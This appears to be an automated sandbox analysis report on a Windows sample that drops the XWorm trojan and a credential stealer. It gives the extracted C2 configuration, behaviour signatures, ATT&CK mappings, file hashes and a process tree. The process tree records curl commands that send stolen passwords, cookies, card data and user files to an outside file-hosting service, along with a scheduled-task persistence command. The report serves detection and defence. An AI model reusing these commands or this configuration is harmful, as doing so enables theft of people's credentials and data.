Analysis

  • max time kernel
    148s
  • max time network
    152s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240226-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system
  • submitted
    30-06-2024 03:55

General

  • Target

    d3c5e789d12756e34a5461e809640b52.exe

  • Size

    15.2MB

  • MD5

    d3c5e789d12756e34a5461e809640b52

  • SHA1

    d8b9710872f0c3ba3e75e3bcd56071625cf4592e

  • SHA256

    b1c30897a9ce11448790b40a820dd26571c9815b277b229715fadf0199870ac2

  • SHA512

    267624b56bb7901fa66d7f8cd9fb5e0602a9054649b15738f84eafd06b56997f552310228a01087e5558725b43c38af87e224570e0e3a4ec570d8f6e0159481e

  • SSDEEP

    393216:AlAEncAYaYUCwkm0r0McGg9p+aBfdRG1itJLr:SnOUCwL/2mpLf/G1YLr

Malware Config

Extracted

Family

xworm

Version

5.0

C2

5.tcp.eu.ngrok.io:14831

Mutex

tGWGfcswkH2xASVw

Attributes
  • Install_directory

    %AppData%

  • install_file

    svchost.exe

aes.plain

Signatures

  • Detect Xworm Payload 2 IoCs
  • Xworm

    Xworm is a remote access trojan written in C#.

  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 3 IoCs
  • Executes dropped EXE 6 IoCs
  • Loads dropped DLL 37 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 27 IoCs
  • Looks up external IP address via web service 3 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Detects Pyinstaller 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 5 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 46 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Users\Admin\AppData\Local\Temp\d3c5e789d12756e34a5461e809640b52.exe
    "C:\Users\Admin\AppData\Local\Temp\d3c5e789d12756e34a5461e809640b52.exe"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:4764
    • C:\Users\Admin\XClient.exe
      "C:\Users\Admin\XClient.exe"
      2⤵
      • Checks computer location settings
      • Drops startup file
      • Executes dropped EXE
      • Adds Run key to start application
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:3572
      • C:\Windows\System32\schtasks.exe
        "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "svchost" /tr "C:\Users\Admin\AppData\Roaming\svchost.exe"
        3⤵
        • Scheduled Task/Job: Scheduled Task
        PID:4592
    • C:\Users\Admin\cstealer.exe
      "C:\Users\Admin\cstealer.exe"
      2⤵
      • Executes dropped EXE
      • Suspicious use of WriteProcessMemory
      PID:2564
      • C:\Users\Admin\cstealer.exe
        "C:\Users\Admin\cstealer.exe"
        3⤵
        • Drops startup file
        • Executes dropped EXE
        • Loads dropped DLL
        • Suspicious use of WriteProcessMemory
        PID:4440
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\cspasswords.txt" https://store10.gofile.io/uploadFile"
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:916
          • C:\Windows\system32\curl.exe
            curl -F "file=@C:\Users\Admin\AppData\Local\Temp\cspasswords.txt" https://store10.gofile.io/uploadFile
            5⤵
              PID:2056
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\cscookies.txt" https://store10.gofile.io/uploadFile"
            4⤵
            • Suspicious use of WriteProcessMemory
            PID:3180
            • C:\Windows\system32\curl.exe
              curl -F "file=@C:\Users\Admin\AppData\Local\Temp\cscookies.txt" https://store10.gofile.io/uploadFile
              5⤵
                PID:2744
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\cscreditcards.txt" https://store10.gofile.io/uploadFile"
              4⤵
              • Suspicious use of WriteProcessMemory
              PID:1892
              • C:\Windows\system32\curl.exe
                curl -F "file=@C:\Users\Admin\AppData\Local\Temp\cscreditcards.txt" https://store10.gofile.io/uploadFile
                5⤵
                  PID:4196
              • C:\Windows\system32\cmd.exe
                C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\csautofills.txt" https://store10.gofile.io/uploadFile"
                4⤵
                • Suspicious use of WriteProcessMemory
                PID:3420
                • C:\Windows\system32\curl.exe
                  curl -F "file=@C:\Users\Admin\AppData\Local\Temp\csautofills.txt" https://store10.gofile.io/uploadFile
                  5⤵
                    PID:2368
                • C:\Windows\system32\cmd.exe
                  C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\cshistories.txt" https://store10.gofile.io/uploadFile"
                  4⤵
                  • Suspicious use of WriteProcessMemory
                  PID:832
                  • C:\Windows\system32\curl.exe
                    curl -F "file=@C:\Users\Admin\AppData\Local\Temp\cshistories.txt" https://store10.gofile.io/uploadFile
                    5⤵
                      PID:1840
                  • C:\Windows\system32\cmd.exe
                    C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\csbookmarks.txt" https://store10.gofile.io/uploadFile"
                    4⤵
                    • Suspicious use of WriteProcessMemory
                    PID:2056
                    • C:\Windows\system32\curl.exe
                      curl -F "file=@C:\Users\Admin\AppData\Local\Temp\csbookmarks.txt" https://store10.gofile.io/uploadFile
                      5⤵
                        PID:4468
                    • C:\Windows\system32\cmd.exe
                      C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin/Desktop/InstallBackup.inf" https://store10.gofile.io/uploadFile"
                      4⤵
                      • Suspicious use of WriteProcessMemory
                      PID:1884
                      • C:\Windows\system32\curl.exe
                        curl -F "file=@C:\Users\Admin/Desktop/InstallBackup.inf" https://store10.gofile.io/uploadFile
                        5⤵
                          PID:2344
                      • C:\Windows\system32\cmd.exe
                        C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin/Documents/RevokeBackup.pptm" https://store10.gofile.io/uploadFile"
                        4⤵
                        • Suspicious use of WriteProcessMemory
                        PID:4864
                        • C:\Windows\system32\curl.exe
                          curl -F "file=@C:\Users\Admin/Documents/RevokeBackup.pptm" https://store10.gofile.io/uploadFile
                          5⤵
                            PID:1880
                        • C:\Windows\system32\cmd.exe
                          C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin/Desktop/RedoBackup.sys" https://store10.gofile.io/uploadFile"
                          4⤵
                          • Suspicious use of WriteProcessMemory
                          PID:828
                          • C:\Windows\system32\curl.exe
                            curl -F "file=@C:\Users\Admin/Desktop/RedoBackup.sys" https://store10.gofile.io/uploadFile
                            5⤵
                              PID:5064
                      • C:\Users\Admin\XWorm V3.1.exe
                        "C:\Users\Admin\XWorm V3.1.exe"
                        2⤵
                        • Executes dropped EXE
                        • Suspicious use of AdjustPrivilegeToken
                        PID:2284
                    • C:\Users\Admin\AppData\Roaming\svchost.exe
                      C:\Users\Admin\AppData\Roaming\svchost.exe
                      1⤵
                      • Executes dropped EXE
                      • Suspicious use of AdjustPrivilegeToken
                      PID:4308
                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=4136 --field-trial-handle=3084,i,4016110471176367543,14287608422419064331,262144 --variations-seed-version /prefetch:8
                      1⤵
                        PID:4704
                      • C:\Users\Admin\AppData\Roaming\svchost.exe
                        C:\Users\Admin\AppData\Roaming\svchost.exe
                        1⤵
                        • Executes dropped EXE
                        • Suspicious use of AdjustPrivilegeToken
                        PID:2328

                      Network

                      MITRE ATT&CK Matrix ATT&CK v13

                      Execution

                      Scheduled Task/Job

                      1
                      T1053

                      Scheduled Task

                      1
                      T1053.005

                      Persistence

                      Boot or Logon Autostart Execution

                      1
                      T1547

                      Registry Run Keys / Startup Folder

                      1
                      T1547.001

                      Scheduled Task/Job

                      1
                      T1053

                      Scheduled Task

                      1
                      T1053.005

                      Privilege Escalation

                      Boot or Logon Autostart Execution

                      1
                      T1547

                      Registry Run Keys / Startup Folder

                      1
                      T1547.001

                      Scheduled Task/Job

                      1
                      T1053

                      Scheduled Task

                      1
                      T1053.005

                      Defense Evasion

                      Modify Registry

                      1
                      T1112

                      Credential Access

                      Unsecured Credentials

                      2
                      T1552

                      Credentials In Files

                      2
                      T1552.001

                      Discovery

                      Query Registry

                      2
                      T1012

                      System Information Discovery

                      2
                      T1082

                      Collection

                      Data from Local System

                      2
                      T1005

                      Command and Control

                      Web Service

                      1
                      T1102

                      Replay Monitor

                      Loading Replay Monitor...

                      Downloads

                      • C:\Users\Admin\AppData\Local\Temp\_MEI25642\Crypto\Cipher\_raw_cbc.pyd
                        Filesize

                        12KB

                        MD5

                        a1b78a3ce3165e90957880b8724d944f

                        SHA1

                        a69f63cc211e671a08daad7a66ed0b05f8736cc7

                        SHA256

                        84e071321e378054b6d3b56bbd66699e36554f637a44728b38b96a31199dfa69

                        SHA512

                        15847386652cbee378d0ff6aad0a3fe0d0c6c7f1939f764f86c665f3493b4bccaf98d7a29259e94ed197285d9365b9d6e697b010aff3370cf857b8cb4106d7d8

                      • C:\Users\Admin\AppData\Local\Temp\_MEI25642\Crypto\Cipher\_raw_cfb.pyd
                        Filesize

                        13KB

                        MD5

                        0dca79c062f2f800132cf1748a8e147f

                        SHA1

                        91f525b8ca0c0db245c4d3fa4073541826e8fb89

                        SHA256

                        2a63e504c8aa4d291bbd8108f26eecde3dcd9bfba579ae80b777ff6dfec5e922

                        SHA512

                        a820299fba1d0952a00db78b92fb7d68d77c427418388cc67e3a37dc87b1895d9ae416cac32b859d11d21a07a8f4cef3bd26ebb06cc39f04ad5e60f8692c659b

                      • C:\Users\Admin\AppData\Local\Temp\_MEI25642\Crypto\Cipher\_raw_ctr.pyd
                        Filesize

                        14KB

                        MD5

                        785f15dc9e505ed828356d978009ecce

                        SHA1

                        830e683b0e539309ecf0f1ed2c7f73dda2011563

                        SHA256

                        b2b68de1d7e5997eb0c8a44c9f2eb958de39b53db8d77a51a84f1d1b197b58b1

                        SHA512

                        16033b72be6d66ab3a44b0480eb245d853a100d13a1e820eff5b12ce0bb73e17d6e48b3e778d1b20d0c04fe1fb8a5723c02ed8af434ae64d0944f847796d98f2

                      • C:\Users\Admin\AppData\Local\Temp\_MEI25642\Crypto\Cipher\_raw_ecb.pyd
                        Filesize

                        10KB

                        MD5

                        aec314222600ade3d96b6dc33af380a6

                        SHA1

                        c6af3edadb09ea3a56048b57237c0a2dca33bee1

                        SHA256

                        ea96505b38d27c085544fb129f2b0e00df5020d323d7853e6a6a8645ac785304

                        SHA512

                        bbc00aa7fdf178bb6b2d86419c31967f2bc32d157aa7ee3ac308c28d8bf4823c1fafcde6c91651edc05c146e44d7e59e02a76283890652b27c52f509c3b9ef9a

                      • C:\Users\Admin\AppData\Local\Temp\_MEI25642\Crypto\Cipher\_raw_ofb.pyd
                        Filesize

                        12KB

                        MD5

                        4ed6d4b1b100384d13f25dfa3737fb78

                        SHA1

                        852a2f76c853db02e65512af35f5b4b4a2346abd

                        SHA256

                        084e4b2da2180ad2a2e96e8804a6f2fc37bce6349eb8a5f6b182116b4d04bd82

                        SHA512

                        276201a9bcb9f88f4bbac0cd9e3ea2da83e0fb4854b1a0dd63cff2af08af3883be34af6f06ece32fad2fd4271a0a09a3b576f1ed78b8a227d13c04a07eaf0827

                      • C:\Users\Admin\AppData\Local\Temp\_MEI25642\Crypto\Hash\_BLAKE2s.pyd
                        Filesize

                        14KB

                        MD5

                        c482fe81df435cddef783ab0d8ad78b6

                        SHA1

                        25e0e650f9135110234091d5263be1721b8fe719

                        SHA256

                        55e20e1effe80f0d6655d690fa445659e0c692b800c4a01ecf3d43dfcb3324b2

                        SHA512

                        ef5a965b8505944e6b37581763cd9d525bbf1b877bfed319535aab675d0382b8655cd6a4f2832f608c1d89cfd0dae6005deda73a86b9d2d6e874953788ee0d36

                      • C:\Users\Admin\AppData\Local\Temp\_MEI25642\Crypto\Hash\_MD5.pyd
                        Filesize

                        15KB

                        MD5

                        9de2cfd4fe88f9e8e3820ce931fc1129

                        SHA1

                        c2ea2284200ebbdc1179f36e8fa79f9ed0b27e80

                        SHA256

                        49e10215e1d6966b03470af10e7d3b8bd5b5d6707a258c3b1286ff002145e3d1

                        SHA512

                        c6d0e43df0e8f8e665bb1a78005a04f673e6b5211db0a0f1d640088782d736838944f0612a59a3c0cb930631108b93fd8c2d51bf191a81a06fb6d5a3388cff06

                      • C:\Users\Admin\AppData\Local\Temp\_MEI25642\Crypto\Hash\_SHA1.pyd
                        Filesize

                        17KB

                        MD5

                        67e8ab67b5db0a50af2aedea886eb362

                        SHA1

                        a7d071a3be454b78a0a0bb100e5d9859c12f98e6

                        SHA256

                        044b09a6351db40fe1f242c70942d865ce4cd42a12f24e358f84ae790677d92d

                        SHA512

                        b2e41422b6642e000d9220a1cf4188b1845a8cf9498338d66ca0dcc0724540694719a4d3eda017ca6f2f77c3d6a6c427c6c86db3910c686cecb58a40c5239e2e

                      • C:\Users\Admin\AppData\Local\Temp\_MEI25642\Crypto\Hash\_SHA256.pyd
                        Filesize

                        21KB

                        MD5

                        7a573f50bd6942e9bb68307e5b6a0bff

                        SHA1

                        7e0e435c8589ec3cecfe6354ae9e5ae868b9b209

                        SHA256

                        c6cd3f23d027febdf48161d3b74edb6c9d4d1bde23f775990f49572d8eb9dfb9

                        SHA512

                        9ecd754b99e020a169366cb8c99816070221c4db2c1ef8c23b6dac765e6bb56ea3abbe969025aecede8eb6c3ea8c626562f2cda3c4ea537c5db1a841f19c2ad5

                      • C:\Users\Admin\AppData\Local\Temp\_MEI25642\Crypto\Util\_strxor.pyd
                        Filesize

                        10KB

                        MD5

                        5738d83e2a66b6ace4f631a9255f81d9

                        SHA1

                        5b6ebb0b82738781732cf7cfd497f5aeb3453de2

                        SHA256

                        f2718adadb6e9958081dcb5570ef737c66772c166a6ad8c0401adcd9a70f46a0

                        SHA512

                        bb21b62fd7fee22dfa04274d0fa1aec666c7845cd2ec3f01f1a0418a2c68f228ec0ae451c793ccae3aa88f1efee5d6019138c0975497518f990b8511b2fd0e75

                      • C:\Users\Admin\AppData\Local\Temp\_MEI25642\VCRUNTIME140.dll
                        Filesize

                        106KB

                        MD5

                        870fea4e961e2fbd00110d3783e529be

                        SHA1

                        a948e65c6f73d7da4ffde4e8533c098a00cc7311

                        SHA256

                        76fdb83fde238226b5bebaf3392ee562e2cb7ca8d3ef75983bf5f9d6c7119644

                        SHA512

                        0b636a3cdefa343eb4cb228b391bb657b5b4c20df62889cd1be44c7bee94ffad6ec82dc4db79949edef576bff57867e0d084e0a597bf7bf5c8e4ed1268477e88

                      • C:\Users\Admin\AppData\Local\Temp\_MEI25642\_bz2.pyd
                        Filesize

                        81KB

                        MD5

                        bbe89cf70b64f38c67b7bf23c0ea8a48

                        SHA1

                        44577016e9c7b463a79b966b67c3ecc868957470

                        SHA256

                        775fbc6e9a4c7e9710205157350f3d6141b5a9e8f44cb07b3eac38f2789c8723

                        SHA512

                        3ee72ba60541116bbca1a62db64074276d40ad8ed7d0ca199a9c51d65c3f0762a8ef6d0e1e9ebf04bf4efe1347f120e4bc3d502dd288339b4df646a59aad0ec1

                      • C:\Users\Admin\AppData\Local\Temp\_MEI25642\_ctypes.pyd
                        Filesize

                        119KB

                        MD5

                        ca4cef051737b0e4e56b7d597238df94

                        SHA1

                        583df3f7ecade0252fdff608eb969439956f5c4a

                        SHA256

                        e60a2b100c4fa50b0b144cf825fe3cde21a8b7b60b92bfc326cb39573ce96b2b

                        SHA512

                        17103d6b5fa84156055e60f9e5756ffc31584cdb6274c686a136291c58ba0be00238d501f8acc1f1ca7e1a1fadcb0c7fefddcb98cedb9dd04325314f7e905df3

                      • C:\Users\Admin\AppData\Local\Temp\_MEI25642\_hashlib.pyd
                        Filesize

                        60KB

                        MD5

                        d856a545a960bf2dca1e2d9be32e5369

                        SHA1

                        67a15ecf763cdc2c2aa458a521db8a48d816d91e

                        SHA256

                        cd33f823e608d3bda759ad441f583a20fc0198119b5a62a8964f172559acb7d3

                        SHA512

                        34a074025c8b28f54c01a7fd44700fdedb391f55be39d578a003edb90732dec793c2b0d16da3da5cdbd8adbaa7b3b83fc8887872e284800e7a8389345a30a6a4

                      • C:\Users\Admin\AppData\Local\Temp\_MEI25642\_lzma.pyd
                        Filesize

                        153KB

                        MD5

                        0a94c9f3d7728cf96326db3ab3646d40

                        SHA1

                        8081df1dca4a8520604e134672c4be79eb202d14

                        SHA256

                        0a70e8546fa6038029f2a3764e721ceebea415818e5f0df6b90d6a40788c3b31

                        SHA512

                        6f047f3bdaead121018623f52a35f7e8b38c58d3a9cb672e8056a5274d02395188975de08cabae948e2cc2c1ca01c74ca7bc1b82e2c23d652e952f3745491087

                      • C:\Users\Admin\AppData\Local\Temp\_MEI25642\_queue.pyd
                        Filesize

                        29KB

                        MD5

                        52d0a6009d3de40f4fa6ec61db98c45c

                        SHA1

                        5083a2aff5bcce07c80409646347c63d2a87bd25

                        SHA256

                        007bcf19d9b036a7e73f5ef31f39bfb1910f72c9c10e4a1b0658352cfe7a8b75

                        SHA512

                        cd552a38efaa8720a342b60318f62320ce20c03871d2e50d3fa3a9a730b84dacdbb8eb4d0ab7a1c8a97215b537826c8dc532c9a55213bcd0c1d13d7d8a9ad824

                      • C:\Users\Admin\AppData\Local\Temp\_MEI25642\_socket.pyd
                        Filesize

                        75KB

                        MD5

                        0f5e64e33f4d328ef11357635707d154

                        SHA1

                        8b6dcb4b9952b362f739a3f16ae96c44bea94a0e

                        SHA256

                        8af6d70d44bb9398733f88bcfb6d2085dd1a193cd00e52120b96a651f6e35ebe

                        SHA512

                        4be9febb583364da75b6fb3a43a8b50ee29ca8fc1dda35b96c0fcc493342372f69b4f27f2604888bca099c8d00f38a16f4c9463c16eff098227d812c29563643

                      • C:\Users\Admin\AppData\Local\Temp\_MEI25642\_sqlite3.pyd
                        Filesize

                        95KB

                        MD5

                        9f38f603bd8f7559609c4ffa47f23c86

                        SHA1

                        8b0136fc2506c1ccef2009db663e4e7006e23c92

                        SHA256

                        28090432a18b59eb8cbe8fdcf11a277420b404007f31ca571321488a43b96319

                        SHA512

                        273a19f2f609bede9634dae7c47d7b28d369c88420b2b62d42858b1268d6c19b450d83877d2dba241e52755a3f67a87f63fea8e5754831c86d16e2a8f214ad72

                      • C:\Users\Admin\AppData\Local\Temp\_MEI25642\_ssl.pyd
                        Filesize

                        155KB

                        MD5

                        9ddb64354ef0b91c6999a4b244a0a011

                        SHA1

                        86a9dc5ea931638699eb6d8d03355ad7992d2fee

                        SHA256

                        e33b7a4aa5cdd5462ee66830636fdd38048575a43d06eb7e2f688358525ddeab

                        SHA512

                        4c86478861fa4220680a94699e7d55fbdc90d2785caee10619cecb058f833292ee7c3d6ac2ed1ef34b38fbff628b79d672194a337701727a54bb6bbc5bf9aeca

                      • C:\Users\Admin\AppData\Local\Temp\_MEI25642\base_library.zip
                        Filesize

                        812KB

                        MD5

                        524a85217dc9edc8c9efc73159ca955d

                        SHA1

                        a4238cbde50443262d00a843ffe814435fb0f4e2

                        SHA256

                        808549964adb09afafb410cdc030df4813c5c2a7276a94e7f116103af5de7621

                        SHA512

                        f5a929b35a63f073bdc7600155ba2f0f262e6f60cf67efb38fa44e8b3be085cf1d5741d66d25a1ecaaf3f94abfe9bbe97d135f8a47c11f2b811d2aac6876f46c

                      • C:\Users\Admin\AppData\Local\Temp\_MEI25642\charset_normalizer\md.cp310-win_amd64.pyd
                        Filesize

                        10KB

                        MD5

                        f33ca57d413e6b5313272fa54dbc8baa

                        SHA1

                        4e0cabe7d38fe8d649a0a497ed18d4d1ca5f4c44

                        SHA256

                        9b3d70922dcfaeb02812afa9030a40433b9d2b58bcf088781f9ab68a74d20664

                        SHA512

                        f17c06f4202b6edbb66660d68ff938d4f75b411f9fab48636c3575e42abaab6464d66cb57bce7f84e8e2b5755b6ef757a820a50c13dd5f85faa63cd553d3ff32

                      • C:\Users\Admin\AppData\Local\Temp\_MEI25642\charset_normalizer\md__mypyc.cp310-win_amd64.pyd
                        Filesize

                        117KB

                        MD5

                        494f5b9adc1cfb7fdb919c9b1af346e1

                        SHA1

                        4a5fddd47812d19948585390f76d5435c4220e6b

                        SHA256

                        ad9bcc0de6815516dfde91bb2e477f8fb5f099d7f5511d0f54b50fa77b721051

                        SHA512

                        2c0d68da196075ea30d97b5fd853c673e28949df2b6bf005ae72fd8b60a0c036f18103c5de662cac63baaef740b65b4ed2394fcd2e6da4dfcfbeef5b64dab794

                      • C:\Users\Admin\AppData\Local\Temp\_MEI25642\libcrypto-1_1.dll
                        Filesize

                        3.3MB

                        MD5

                        6f4b8eb45a965372156086201207c81f

                        SHA1

                        8278f9539463f0a45009287f0516098cb7a15406

                        SHA256

                        976ce72efd0a8aeeb6e21ad441aa9138434314ea07f777432205947cdb149541

                        SHA512

                        2c5c54842aba9c82fb9e7594ae9e264ac3cbdc2cc1cd22263e9d77479b93636799d0f28235ac79937070e40b04a097c3ea3b7e0cd4376a95ed8ca90245b7891f

                      • C:\Users\Admin\AppData\Local\Temp\_MEI25642\libffi-7.dll
                        Filesize

                        32KB

                        MD5

                        eef7981412be8ea459064d3090f4b3aa

                        SHA1

                        c60da4830ce27afc234b3c3014c583f7f0a5a925

                        SHA256

                        f60dd9f2fcbd495674dfc1555effb710eb081fc7d4cae5fa58c438ab50405081

                        SHA512

                        dc9ff4202f74a13ca9949a123dff4c0223da969f49e9348feaf93da4470f7be82cfa1d392566eaaa836d77dde7193fed15a8395509f72a0e9f97c66c0a096016

                      • C:\Users\Admin\AppData\Local\Temp\_MEI25642\libssl-1_1.dll
                        Filesize

                        686KB

                        MD5

                        8769adafca3a6fc6ef26f01fd31afa84

                        SHA1

                        38baef74bdd2e941ccd321f91bfd49dacc6a3cb6

                        SHA256

                        2aebb73530d21a2273692a5a3d57235b770daf1c35f60c74e01754a5dac05071

                        SHA512

                        fac22f1a2ffbfb4789bdeed476c8daf42547d40efe3e11b41fadbc4445bb7ca77675a31b5337df55fdeb4d2739e0fb2cbcac2feabfd4cd48201f8ae50a9bd90b

                      • C:\Users\Admin\AppData\Local\Temp\_MEI25642\python310.dll
                        Filesize

                        4.3MB

                        MD5

                        deaf0c0cc3369363b800d2e8e756a402

                        SHA1

                        3085778735dd8badad4e39df688139f4eed5f954

                        SHA256

                        156cf2b64dd0f4d9bdb346b654a11300d6e9e15a65ef69089923dafc1c71e33d

                        SHA512

                        5cac1d92af7ee18425b5ee8e7cd4e941a9ddffb4bc1c12bb8aeabeed09acec1ff0309abc41a2e0c8db101fee40724f8bfb27a78898128f8746c8fe01c1631989

                      • C:\Users\Admin\AppData\Local\Temp\_MEI25642\select.pyd
                        Filesize

                        28KB

                        MD5

                        c119811a40667dca93dfe6faa418f47a

                        SHA1

                        113e792b7dcec4366fc273e80b1fc404c309074c

                        SHA256

                        8f27cd8c5071cb740a2191b3c599e99595b121f461988166f07d9f841e7116b7

                        SHA512

                        107257dbd8cf2607e4a1c7bef928a6f61ebdfc21be1c4bdc3a649567e067e9bb7ea40c0ac8844d2cedd08682447b963148b52f85adb1837f243df57af94c04b3

                      • C:\Users\Admin\AppData\Local\Temp\_MEI25642\sqlite3.dll
                        Filesize

                        1.4MB

                        MD5

                        aaf9fd98bc2161ad7dff996450173a3b

                        SHA1

                        ab634c09b60aa18ea165084a042d917b65d1fe85

                        SHA256

                        f1e8b6c4d61ac6a320fa2566da9391fbfd65a5ac34ac2e2013bc37c8b7b41592

                        SHA512

                        597ffe3c2f0966ab94fbb7ecac27160c691f4a07332311f6a9baf8dec8b16fb16ec64df734c3bdbabf2c0328699e234d14f1b8bd5ac951782d35ea0c78899e5f

                      • C:\Users\Admin\AppData\Local\Temp\_MEI25642\unicodedata.pyd
                        Filesize

                        1.1MB

                        MD5

                        4c8af8a30813e9380f5f54309325d6b8

                        SHA1

                        169a80d8923fb28f89bc26ebf89ffe37f8545c88

                        SHA256

                        4b6e3ba734c15ec789b5d7469a5097bd082bdfd8e55e636ded0d097cf6511e05

                        SHA512

                        ea127779901b10953a2bf9233e20a4fab2fba6f97d7baf40c1b314b7cd03549e0f4d2fb9bad0fbc23736e21eb391a418d79a51d64402245c1cd8899e4d765c5a

                      • C:\Users\Admin\AppData\Local\Tempcshbvyyyyw.db
                        Filesize

                        92KB

                        MD5

                        4c2e2189b87f507edc2e72d7d55583a0

                        SHA1

                        1f06e340f76d41ea0d1e8560acd380a901b2a5bd

                        SHA256

                        99a5f8dea08b5cf512ed888b3e533cc77c08dc644078793dc870abd8828c1bca

                        SHA512

                        8b6b49e55afe8a697aaf71d975fab9e906143339827f75a57876a540d0d7b9e3cbbcdd8b5435d6198900a73895cc52d2082e66ee8cec342e72f2e427dde71600

                      • C:\Users\Admin\AppData\Local\Tempcsjrdgetej.db
                        Filesize

                        220KB

                        MD5

                        17e88e1988f31e181a9dd452db998ccc

                        SHA1

                        6752250637ab254afad308599f5f061b97efec95

                        SHA256

                        6ebca9be729888af294c2481ba5a9aa4505d29599bb4853927ada39e7c2d5ba1

                        SHA512

                        1af9877c3cc065e5e89af676b9f72482c35fdf9013c2b11e9d95dc2a4e32280c0064b5fbb8db22e1b1ec3c2cd0bc71dc2cfa6a0bbf6405ded6f589aee4fc59bf

                      • C:\Users\Admin\XClient.exe
                        Filesize

                        44KB

                        MD5

                        cb6f9a73c242da249935950cbb0d4768

                        SHA1

                        f3562339911c4783e1957e6f87abbcff9ec989dc

                        SHA256

                        fe0b5c8df242e03f89a6fcebbc23611ec3bd59fe082659eaf67adf0444879a4b

                        SHA512

                        46280158482f0a73fff728317c2d9413d25bbcce9827af5393696cab9978d4b507975519c87ba175b4064a0db5fc1881b905f3af82acf5ee29be3d371ee71bc5

                      • C:\Users\Admin\XWorm V3.1.exe
                        Filesize

                        6.9MB

                        MD5

                        37a9fdc56e605d2342da88a6e6182b4b

                        SHA1

                        20bc3df33bbbb676d2a3c572cff4c1d58c79055d

                        SHA256

                        422ba689937e3748a4b6bd3c5af2dce0211e8a48eb25767e6d1d2192d27f1f58

                        SHA512

                        f556805142b77b549845c0fa2206a4cb29d54752dc5650d9db58c1bbe1f7d0fc15ce04551853fb6454873877dbb88bebd15d81b875b405cdcc2fd21a515820d3

                      • C:\Users\Admin\cstealer.exe
                        Filesize

                        8.2MB

                        MD5

                        772fd94b8537d5e9390c9d3ae39fedba

                        SHA1

                        1be9196b05f9134a60a9b8e96c7c2c35db6e0430

                        SHA256

                        bf4cf925cbe3a7e1e55c35f153a08dbaec5f873629a4e8fd78a1c645d6dfc520

                        SHA512

                        98a90466b56bf088926b7b24b36f155e6f008eb0236f090241798d97c411899c9a9587f28c4cfb7fd4cd4e3eef89f6e42e456bfd013da34b1c239a3c1dd3c780

                      • memory/2284-133-0x0000000000720000-0x0000000000E16000-memory.dmp
                        Filesize

                        7.0MB

                      • memory/2284-194-0x000000001D120000-0x000000001DC8A000-memory.dmp
                        Filesize

                        11.4MB

                      • memory/3572-35-0x00007FF894140000-0x00007FF894C01000-memory.dmp
                        Filesize

                        10.8MB

                      • memory/3572-31-0x0000000000C50000-0x0000000000C62000-memory.dmp
                        Filesize

                        72KB

                      • memory/3572-62-0x00007FF894140000-0x00007FF894C01000-memory.dmp
                        Filesize

                        10.8MB

                      • memory/3572-262-0x00007FF894140000-0x00007FF894C01000-memory.dmp
                        Filesize

                        10.8MB

                      • memory/3572-263-0x00007FF894140000-0x00007FF894C01000-memory.dmp
                        Filesize

                        10.8MB

                      • memory/4764-1-0x0000000000DE0000-0x0000000001D1C000-memory.dmp
                        Filesize

                        15.2MB

                      • memory/4764-0-0x00007FF894143000-0x00007FF894145000-memory.dmp
                        Filesize

                        8KB